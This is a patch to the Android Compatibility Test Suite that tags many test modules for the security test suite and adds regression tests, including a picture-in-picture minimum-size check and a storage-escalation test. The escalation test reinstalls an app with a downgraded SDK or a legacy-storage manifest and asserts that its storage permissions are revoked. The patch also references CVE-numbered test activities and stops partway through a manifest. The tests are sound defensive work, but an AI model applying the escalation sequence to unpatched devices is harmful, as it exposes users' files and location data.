@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.server.wm.app;
+
+/**
+ * An activity that has the same behavior as {@link PipActivity} and specifies
+ * minimal dimension in its manifest which is tiny and smaller than the allowed minimum.
+ */
+public class PipActivityWithTinyMinimalSize extends PipActivity {
+}
diff --git a/tests/framework/base/windowmanager/app27/Android.bp b/tests/framework/base/windowmanager/app27/Android.bp
index 6ddf919..79d2d22 100644
--- a/tests/framework/base/windowmanager/app27/Android.bp
+++ b/tests/framework/base/windowmanager/app27/Android.bp
@@ -26,5 +26,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/appAShareUid/Android.bp b/tests/framework/base/windowmanager/appAShareUid/Android.bp
index 57adfd6..052f829 100644
--- a/tests/framework/base/windowmanager/appAShareUid/Android.bp
+++ b/tests/framework/base/windowmanager/appAShareUid/Android.bp
@@ -26,5 +26,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/appBShareUid/Android.bp b/tests/framework/base/windowmanager/appBShareUid/Android.bp
index ec15e80..8fe4775 100644
--- a/tests/framework/base/windowmanager/appBShareUid/Android.bp
+++ b/tests/framework/base/windowmanager/appBShareUid/Android.bp
@@ -26,5 +26,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/appDeprecatedSdk/Android.bp b/tests/framework/base/windowmanager/appDeprecatedSdk/Android.bp
index c83b44f..8582bf1 100644
--- a/tests/framework/base/windowmanager/appDeprecatedSdk/Android.bp
+++ b/tests/framework/base/windowmanager/appDeprecatedSdk/Android.bp
@@ -26,5 +26,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/appDisplaySize/Android.bp b/tests/framework/base/windowmanager/appDisplaySize/Android.bp
index 819a9bf..d492d7b 100644
--- a/tests/framework/base/windowmanager/appDisplaySize/Android.bp
+++ b/tests/framework/base/windowmanager/appDisplaySize/Android.bp
@@ -26,5 +26,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/appPrereleaseSdk/Android.bp b/tests/framework/base/windowmanager/appPrereleaseSdk/Android.bp
index d110d19..6f5d5e4 100644
--- a/tests/framework/base/windowmanager/appPrereleaseSdk/Android.bp
+++ b/tests/framework/base/windowmanager/appPrereleaseSdk/Android.bp
@@ -24,5 +24,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/appProfileable/Android.bp b/tests/framework/base/windowmanager/appProfileable/Android.bp
index cd54094..2dcd954 100644
--- a/tests/framework/base/windowmanager/appProfileable/Android.bp
+++ b/tests/framework/base/windowmanager/appProfileable/Android.bp
@@ -26,5 +26,6 @@
"cts",
"vts10",
"general-tests",
+ "sts"
],
}
diff --git a/tests/framework/base/windowmanager/appSecondUid/Android.bp b/tests/framework/base/windowmanager/appSecondUid/Android.bp
index 5f44f5c..692f73b 100644
--- a/tests/framework/base/windowmanager/appSecondUid/Android.bp
+++ b/tests/framework/base/windowmanager/appSecondUid/Android.bp
@@ -26,5 +26,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/appThirdUid/Android.bp b/tests/framework/base/windowmanager/appThirdUid/Android.bp
index 08a878c..22bab9d 100644
--- a/tests/framework/base/windowmanager/appThirdUid/Android.bp
+++ b/tests/framework/base/windowmanager/appThirdUid/Android.bp
@@ -26,5 +26,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/dndsourceapp/Android.bp b/tests/framework/base/windowmanager/dndsourceapp/Android.bp
index 7abd478..9a1463e 100644
--- a/tests/framework/base/windowmanager/dndsourceapp/Android.bp
+++ b/tests/framework/base/windowmanager/dndsourceapp/Android.bp
@@ -26,5 +26,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/dndtargetapp/Android.bp b/tests/framework/base/windowmanager/dndtargetapp/Android.bp
index 00b4055..0a14121 100644
--- a/tests/framework/base/windowmanager/dndtargetapp/Android.bp
+++ b/tests/framework/base/windowmanager/dndtargetapp/Android.bp
@@ -24,6 +24,7 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
static_libs: ["cts-wm-app-base"],
diff --git a/tests/framework/base/windowmanager/dndtargetappsdk23/Android.bp b/tests/framework/base/windowmanager/dndtargetappsdk23/Android.bp
index 13dbca2..4420670 100644
--- a/tests/framework/base/windowmanager/dndtargetappsdk23/Android.bp
+++ b/tests/framework/base/windowmanager/dndtargetappsdk23/Android.bp
@@ -24,6 +24,7 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
static_libs: ["cts-wm-app-base"],
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
index 3ac15bb..6e19de2 100644
--- a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
+++ b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
@@ -29,6 +29,7 @@
import static android.server.wm.WindowManagerState.STATE_PAUSED;
import static android.server.wm.WindowManagerState.STATE_RESUMED;
import static android.server.wm.WindowManagerState.STATE_STOPPED;
+import static android.server.wm.WindowManagerState.dpToPx;
import static android.server.wm.app.Components.ALWAYS_FOCUSABLE_PIP_ACTIVITY;
import static android.server.wm.app.Components.LAUNCHING_ACTIVITY;
import static android.server.wm.app.Components.LAUNCH_ENTER_PIP_ACTIVITY;
@@ -38,6 +39,7 @@
import static android.server.wm.app.Components.PIP_ACTIVITY2;
import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_MINIMAL_SIZE;
import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_SAME_AFFINITY;
+import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE;
import static android.server.wm.app.Components.PIP_ON_STOP_ACTIVITY;
import static android.server.wm.app.Components.PipActivity.ACTION_ENTER_PIP;
import static android.server.wm.app.Components.PipActivity.ACTION_FINISH;
@@ -89,6 +91,7 @@
import android.os.Handler;
import android.os.Looper;
import android.platform.test.annotations.Presubmit;
+import android.platform.test.annotations.SecurityTest;
import android.provider.Settings;
import android.server.wm.CommandSession.ActivityCallback;
import android.server.wm.CommandSession.SizeInfo;
@@ -144,6 +147,8 @@
private static final int MAX_ASPECT_RATIO_NUMERATOR = 239;
private static final int MAX_ASPECT_RATIO_DENOMINATOR = 100;
private static final int ABOVE_MAX_ASPECT_RATIO_NUMERATOR = MAX_ASPECT_RATIO_NUMERATOR + 1;
+ // Corresponds to com.android.internal.R.dimen.overridable_minimal_size_pip_resizable_task
+ private static final int OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK = 48;
@Before
@Override
@@ -250,8 +255,6 @@
assertPinnedStackActivityIsInDisplayBounds(PIP_ACTIVITY);
}
- // TODO: launch/size pip to a size smaller than limitation and verify the minWidth/minHeight
- // is respected after b/149338177.
@Test
public void testEnterPipWithMinimalSize() throws Exception {
// Launch a PiP activity with minimal size specified
@@ -276,6 +279,30 @@
}
@Test
+ @SecurityTest(minPatchLevel="2021-03")
+ public void testEnterPipWithTinyMinimalSize() throws Exception {
+ // Launch a PiP activity with minimal size specified and smaller than allowed minimum
+ launchActivity(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE, EXTRA_ENTER_PIP, "true");
+ // Wait for animation complete since we are comparing size
+ waitForEnterPipAnimationComplete(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE);
+ assertPinnedStackExists();
+
+ final WindowManagerState.WindowState windowState = getWindowState(
+ PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE);
+ final WindowManagerState.DisplayContent display = mWmState.getDisplay(
+ windowState.getDisplayId());
+ final int overridableMinSize = dpToPx(
+ OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK, display.getDpi());
+
+ // compare the bounds to verify that it's no smaller than allowed minimum on both dimensions
+ final Rect pipBounds = getPinnedStackBounds();
+ assertTrue("Pinned task bounds " + pipBounds + " isn't smaller than minimal "
+ + overridableMinSize + " on both dimensions",
+ pipBounds.width() >= overridableMinSize
+ && pipBounds.height() >= overridableMinSize);
+ }
+
+ @Test
public void testEnterPipAspectRatioMin() throws Exception {
testEnterPipAspectRatio(MIN_ASPECT_RATIO_NUMERATOR, MIN_ASPECT_RATIO_DENOMINATOR);
}
diff --git a/tests/framework/base/windowmanager/translucentapp/Android.bp b/tests/framework/base/windowmanager/translucentapp/Android.bp
index c551c29..3a19970 100644
--- a/tests/framework/base/windowmanager/translucentapp/Android.bp
+++ b/tests/framework/base/windowmanager/translucentapp/Android.bp
@@ -31,5 +31,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/translucentappsdk26/Android.bp b/tests/framework/base/windowmanager/translucentappsdk26/Android.bp
index 7c8d0d8..4ec800b 100644
--- a/tests/framework/base/windowmanager/translucentappsdk26/Android.bp
+++ b/tests/framework/base/windowmanager/translucentappsdk26/Android.bp
@@ -29,5 +29,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/inputmethod/mockime/Android.bp b/tests/inputmethod/mockime/Android.bp
index c73f870..dbf6ad1 100644
--- a/tests/inputmethod/mockime/Android.bp
+++ b/tests/inputmethod/mockime/Android.bp
@@ -42,6 +42,7 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
static_libs: [
"androidx.annotation_annotation",
diff --git a/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java b/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java
index 974d02a..790880b 100644
--- a/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java
+++ b/tests/sensor/src/android/hardware/cts/SensorDirectReportTest.java
@@ -933,6 +933,11 @@
if (samplingPeriodUs < s.getMinDelay()) {
return;
}
+
+ if (samplingPeriodUs > s.getMaxDelay()) {
+ samplingPeriodUs = s.getMaxDelay();
+ }
+
resetEvent();
mChannel = prepareDirectChannel(memType, false /* secondary */);
diff --git a/tests/tests/media/AndroidManifest.xml b/tests/tests/media/AndroidManifest.xml
index 3825d8f..c24f26b 100644
--- a/tests/tests/media/AndroidManifest.xml
+++ b/tests/tests/media/AndroidManifest.xml
@@ -123,7 +123,7 @@
</intent-filter>
</activity>
<activity android:name="android.media.cts.MockActivity" />
- <activity android:name="android.media.cts.MediaRouter2TestActivity"/>
+ <activity android:name="android.media.cts.MediaRouter2TestActivity" />
<service android:name="android.media.cts.RemoteVirtualDisplayService"
android:process=":remoteService" >
<intent-filter>
diff --git a/tests/tests/packageinstaller/emptytestapp/Android.bp b/tests/tests/packageinstaller/emptytestapp/Android.bp
index 3c8939b..5c46380 100644
--- a/tests/tests/packageinstaller/emptytestapp/Android.bp
+++ b/tests/tests/packageinstaller/emptytestapp/Android.bp
@@ -23,5 +23,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/tests/packageinstaller/uninstall/Android.bp b/tests/tests/packageinstaller/uninstall/Android.bp
index 50d1a52..8ae5bb4 100644
--- a/tests/tests/packageinstaller/uninstall/Android.bp
+++ b/tests/tests/packageinstaller/uninstall/Android.bp
@@ -30,5 +30,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/tests/permission/AndroidTest.xml b/tests/tests/permission/AndroidTest.xml
index 5277c9a..66b6560 100644
--- a/tests/tests/permission/AndroidTest.xml
+++ b/tests/tests/permission/AndroidTest.xml
@@ -65,6 +65,9 @@
<option name="push" value="CtsInstallPermissionEscalatorApp.apk->/data/local/tmp/cts/permissions/CtsInstallPermissionEscalatorApp.apk" />
<option name="push" value="CtsAppThatRequestsOneTimePermission.apk->/data/local/tmp/cts/permissions/CtsAppThatRequestsOneTimePermission.apk" />
<option name="push" value="AppThatDefinesUndefinedPermissionGroupElement.apk->/data/local/tmp/cts/permissions/AppThatDefinesUndefinedPermissionGroupElement.apk" />
+ <option name="push" value="CtsStorageEscalationApp28.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp28.apk" />
+ <option name="push" value="CtsStorageEscalationApp29Full.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Full.apk" />
+ <option name="push" value="CtsStorageEscalationApp29Scoped.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Scoped.apk" />
</target_preparer>
<!-- Remove additional apps if installed -->
diff --git a/tests/tests/permission/StorageEscalationApp28/Android.bp b/tests/tests/permission/StorageEscalationApp28/Android.bp
new file mode 100644
index 0000000..959a00a
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp28/Android.bp
@@ -0,0 +1,25 @@
+//
+// Copyright (C) 2016 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+android_test_helper_app {
+ name: "CtsStorageEscalationApp28",
+ certificate: ":cts-testkey2",
+ test_suites: [
+ "cts",
+ "general-tests",
+ "sts",
+ ],
+}
diff --git a/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml
new file mode 100644
index 0000000..f1bd315
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2016 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.storageescalation">
+
+ <uses-sdk android:minSdkVersion="28" android:targetSdkVersion="28" />
+
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" />
+
+ <application android:hasCode="false" />
+</manifest>
diff --git a/tests/tests/permission/StorageEscalationApp29Full/Android.bp b/tests/tests/permission/StorageEscalationApp29Full/Android.bp
new file mode 100644
index 0000000..8eeb101
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Full/Android.bp
@@ -0,0 +1,25 @@
+//
+// Copyright (C) 2016 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+android_test_helper_app {
+ name: "CtsStorageEscalationApp29Full",
+ certificate: ":cts-testkey2",
+ test_suites: [
+ "cts",
+ "general-tests",
+ "sts",
+ ],
+}
diff --git a/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml
new file mode 100644
index 0000000..73a7110
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2016 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.storageescalation">
+
+ <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" />
+
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" />
+
+ <application android:hasCode="false" android:requestLegacyExternalStorage="true"/>
+</manifest>
diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp
new file mode 100644
index 0000000..97b8a21
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp
@@ -0,0 +1,25 @@
+//
+// Copyright (C) 2016 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+android_test_helper_app {
+ name: "CtsStorageEscalationApp29Scoped",
+ certificate: ":cts-testkey2",
+ test_suites: [
+ "cts",
+ "general-tests",
+ "sts",
+ ],
+}
diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml
new file mode 100644
index 0000000..c3812fe
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2016 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.storageescalation">
+
+ <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" />
+
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" />
+
+ <application android:hasCode="false" android:requestLegacyExternalStorage="false"/>
+</manifest>
diff --git a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java
index b53bf6a..d81ab06 100644
--- a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java
+++ b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java
@@ -18,10 +18,8 @@
import static android.Manifest.permission.ACCESS_BACKGROUND_LOCATION;
import static android.Manifest.permission.ACCESS_COARSE_LOCATION;
-import static android.Manifest.permission.ACCESS_MEDIA_LOCATION;
import static android.Manifest.permission.READ_CALL_LOG;
import static android.Manifest.permission.READ_CONTACTS;
-import static android.Manifest.permission.READ_EXTERNAL_STORAGE;
import static android.app.AppOpsManager.MODE_FOREGROUND;
import static android.content.pm.PackageManager.FLAG_PERMISSION_REVIEW_REQUIRED;
import static android.content.pm.PackageManager.FLAG_PERMISSION_USER_SET;
@@ -268,22 +266,6 @@
* If a permission was granted before the split happens, the new permission should inherit the
* granted state.
*
- * This is a duplicate of {@link #inheritGrantedPermissionState} but for the storage permission
- */
- @Test
- public void inheritGrantedPermissionStateStorage() throws Exception {
- install(APK_STORAGE_29);
- grantPermission(APP_PKG, READ_EXTERNAL_STORAGE);
-
- install(APK_STORAGE_28);
-
- assertPermissionGranted(ACCESS_MEDIA_LOCATION);
- }
-
- /**
- * If a permission was granted before the split happens, the new permission should inherit the
- * granted state.
- *
* <p>App using a shared uid
*/
@Test
diff --git a/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt
new file mode 100644
index 0000000..2e67179
--- /dev/null
+++ b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.permission.cts
+
+import android.Manifest.permission.ACCESS_MEDIA_LOCATION
+import android.Manifest.permission.READ_EXTERNAL_STORAGE
+import android.Manifest.permission.WRITE_EXTERNAL_STORAGE
+import android.app.Instrumentation
+import android.app.UiAutomation
+import android.content.Context
+import android.content.pm.PackageManager
+import android.platform.test.annotations.SecurityTest
+import androidx.test.platform.app.InstrumentationRegistry
+import com.android.compatibility.common.util.SystemUtil
+import org.junit.After
+import org.junit.Assert
+import org.junit.Before
+import org.junit.Test
+
+class StorageEscalationTest {
+ companion object {
+ private const val APK_DIRECTORY = "/data/local/tmp/cts/permissions"
+ const val APP_APK_PATH_28 = "$APK_DIRECTORY/CtsStorageEscalationApp28.apk"
+ const val APP_APK_PATH_29_SCOPED = "$APK_DIRECTORY/CtsStorageEscalationApp29Scoped.apk"
+ const val APP_APK_PATH_29_FULL = "$APK_DIRECTORY/CtsStorageEscalationApp29Full.apk"
+ const val APP_PACKAGE_NAME = "android.permission3.cts.storageescalation"
+ const val DELAY_TIME_MS: Long = 200
+ val permissions = listOf<String>(READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE,
+ ACCESS_MEDIA_LOCATION)
+ }
+
+ private val instrumentation: Instrumentation = InstrumentationRegistry.getInstrumentation()
+ private val context: Context = instrumentation.context
+ private val uiAutomation: UiAutomation = instrumentation.uiAutomation
+
+ @Before
+ @After
+ fun uninstallApp() {
+ SystemUtil.runShellCommand("pm uninstall $APP_PACKAGE_NAME")
+ }
+
+ private fun installPackage(apk: String) {
+ SystemUtil.runShellCommand("pm install -r $apk")
+ }
+
+ private fun grantStoragePermissions() {
+ for (permName in permissions) {
+ uiAutomation.grantRuntimePermission(APP_PACKAGE_NAME, permName)
+ }
+ }
+
+ private fun assertStoragePermissionState(granted: Boolean) {
+ for (permName in permissions) {
+ Assert.assertEquals(granted, context.packageManager.checkPermission(permName,
+ APP_PACKAGE_NAME) == PackageManager.PERMISSION_GRANTED)
+ }
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2021-03")
+ fun testCannotEscalateWithSdkDowngrade() {
+ runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_28)
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2021-03")
+ fun testCannotEscalateWithNewManifestLegacyRequest() {
+ runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_29_FULL)
+ }
+
+ private fun runStorageEscalationTest(startPackageApk: String, finishPackageApk: String) {
+ installPackage(startPackageApk)
+ grantStoragePermissions()
+ assertStoragePermissionState(granted = true)
+ installPackage(finishPackageApk)
+ // permission revoke is async, so wait a short period
+ Thread.sleep(DELAY_TIME_MS)
+ assertStoragePermissionState(granted = false)
+ }
+}
diff --git a/tests/tests/permission2/res/raw/android_manifest.xml b/tests/tests/permission2/res/raw/android_manifest.xml
index 4acb83f..974012f 100644
--- a/tests/tests/permission2/res/raw/android_manifest.xml
+++ b/tests/tests/permission2/res/raw/android_manifest.xml
@@ -478,6 +478,8 @@
<protected-broadcast android:name="android.app.action.ACTION_PASSWORD_FAILED" />
<protected-broadcast android:name="android.app.action.ACTION_PASSWORD_SUCCEEDED" />
<protected-broadcast android:name="com.android.server.ACTION_EXPIRED_PASSWORD_NOTIFICATION" />
+ <protected-broadcast android:name="com.android.server.ACTION_PROFILE_OFF_DEADLINE" />
+ <protected-broadcast android:name="com.android.server.ACTION_TURN_PROFILE_ON_NOTIFICATION" />
<protected-broadcast android:name="android.intent.action.MANAGED_PROFILE_ADDED" />
<protected-broadcast android:name="android.intent.action.MANAGED_PROFILE_UNLOCKED" />
diff --git a/tests/tests/provider/Android.bp b/tests/tests/provider/Android.bp
index 4c797d0..7dac784 100644
--- a/tests/tests/provider/Android.bp
+++ b/tests/tests/provider/Android.bp
@@ -9,6 +9,7 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
libs: [
diff --git a/tests/tests/provider/preconditions/Android.bp b/tests/tests/provider/preconditions/Android.bp
index 31247b0..93868ac 100644
--- a/tests/tests/provider/preconditions/Android.bp
+++ b/tests/tests/provider/preconditions/Android.bp
@@ -11,6 +11,7 @@
"cts",
"vts10",
"general-tests",
+ "sts"
],
host_supported: true,
device_supported: false,
diff --git a/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java b/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java
index 5026c0ed..7707f12 100644
--- a/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java
+++ b/tests/tests/provider/src/android/provider/cts/media/MediaStore_Video_MediaTest.java
@@ -38,6 +38,7 @@
import android.os.FileUtils;
import android.os.ParcelFileDescriptor;
import android.os.storage.StorageManager;
+import android.platform.test.annotations.SecurityTest;
import android.provider.MediaStore;
import android.provider.MediaStore.Files.FileColumns;
import android.provider.MediaStore.Video.Media;
@@ -254,6 +255,7 @@
}
}
+ @SecurityTest
@Test
public void testIsoLocationRedaction() throws Exception {
// STOPSHIP: remove this once isolated storage is always enabled
diff --git a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
index 5584fab..16d595f 100644
--- a/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
+++ b/tests/tests/provider/src/android/provider/cts/settings/Settings_SystemTest.java
@@ -27,6 +27,7 @@
import android.database.Cursor;
import android.net.Uri;
import android.os.SystemClock;
+import android.platform.test.annotations.SecurityTest;
import android.provider.Settings;
import android.provider.Settings.SettingNotFoundException;
import android.provider.Settings.System;
@@ -139,6 +140,10 @@
}
}
+ /**
+ * Verifies that the invalid values for the font scale setting are rejected.
+ */
+ @SecurityTest(minPatchLevel = "2021-02")
@Test
public void testSystemSettingsRejectInvalidFontSizeScale() throws SettingNotFoundException {
final ContentResolver cr = InstrumentationRegistry.getTargetContext().getContentResolver();
diff --git a/tests/tests/security/Android.bp b/tests/tests/security/Android.bp
index 41d9fad..743ea88 100644
--- a/tests/tests/security/Android.bp
+++ b/tests/tests/security/Android.bp
@@ -27,6 +27,7 @@
"compatibility-common-util-devicesidelib",
"guava",
"platform-test-annotations",
+ "hamcrest-library",
],
libs: [
"android.test.runner.stubs",
@@ -53,6 +54,7 @@
"src/**/*.java",
"src/android/security/cts/activity/ISecureRandomService.aidl",
"aidl/android/security/cts/IIsolatedService.aidl",
+ "aidl/android/security/cts/CVE_2021_0327/IBadProvider.aidl",
],
//sdk_version: "current",
platform_apis: true,
@@ -75,4 +77,4 @@
android_app_certificate {
name: "security_cts_test_certificate",
certificate: "security_cts_test_cert",
-}
\ No newline at end of file
+}
diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml
index ad23b07..31f4c59 100644
--- a/tests/tests/security/AndroidManifest.xml
+++ b/tests/tests/security/AndroidManifest.xml
@@ -102,6 +102,71 @@
<data android:mimeType="application/vnd.android.package-archive" />
</intent-filter>
</receiver>
+
+ <activity android:name="android.security.cts.CVE_2021_0339$FirstActivity"
+ android:label="TAT Anim1"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN"/>
+ <category android:name="android.intent.category.LAUNCHER"/>
+ </intent-filter>
+ </activity>
+
+ <activity android:name="android.security.cts.CVE_2021_0339$SecondActivity"
+ android:label="TAT Anim2"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN"/>
